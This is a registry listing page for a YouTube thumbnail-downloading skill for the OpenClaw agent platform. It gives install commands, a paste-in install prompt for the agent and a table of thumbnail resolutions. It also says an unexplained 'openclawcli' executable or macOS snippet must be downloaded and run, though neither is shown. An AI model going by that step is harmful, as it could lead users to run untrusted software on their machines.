A versatile tool for downloading YouTube video thumbnails in multiple resolutions and formats using yt-dlp.
The fastest way to install a skill directly from the registry.
npx clawhub@latest install youtube-thumbnail-grabber
Copy the skill folder to one of these locations
~/.openclaw/skills/ <project>/skills/ Priority: Workspace > Local > Bundled
Copy this prompt to OpenClaw to install it automatically.
Help me install youtube-thumbnail-grabber using Clawhub. If Clawhub is not installed, install it first (npm i -g clawhub).
Get the raw skill files in a ZIP archive.
The YouTube Thumbnail Grabber is a technical utility designed to fetch preview images from YouTube videos with precision. By leveraging yt-dlp and the underlying infrastructure of Openclaw Skills, this tool allows users to extract thumbnails in various qualities, from standard definition to maximum resolution. It is particularly useful for developers building media galleries or creators who need high-quality assets for their workflows.
This skill requires the openclawcli utility to be active on the host machine to manage image operations and downloads successfully. Whether you are automating a media pipeline or grabbing a single frame, this component of Openclaw Skills ensures a reliable and streamlined experience.
To begin using this skill, install the core dependency via pip:
pip install yt-dlp
Additionally, you must have the openclawcli utility active. Download and run the executable for Windows or execute the installation snippet for macOS to ensure compatibility with Openclaw Skills.
The skill organizes downloads based on resolution types and video IDs. Below is the mapping for YouTube thumbnail data types:
| Name | Resolution | Notes |
|---|---|---|
| maxresdefault | 1280x720 | Highest quality; typically available for HD videos |
| hqdefault | 480x360 | High quality standard preview |
| mqdefault | 320x180 | Medium quality preview |
| default | 120x90 | Smallest size; always available |
| 0, 1, 2, 3 | 120x90 | Specific frame captures from different parts of the video |
Loading
A powerful utility to programmatically extract, clean, and prepare YouTube transcripts for AI-driven summarization and content analysis.

A powerful financial data integration for retrieving real-time stock prices, historical market trends, and detailed company analytics.

A professional CLI-driven skill for fetching, filtering, and analyzing real-time trending topics and hashtags on X (Twitter).

A powerful CLI-driven skill for searching, filtering, and analyzing trending topics on X (Twitter) across global and local markets.

A comprehensive map and travel planning skill for managing locations, spots, and daily itineraries.

A high-performance neural search engine integration that allows AI agents to perform deep, category-specific web research and full-text content extraction.








































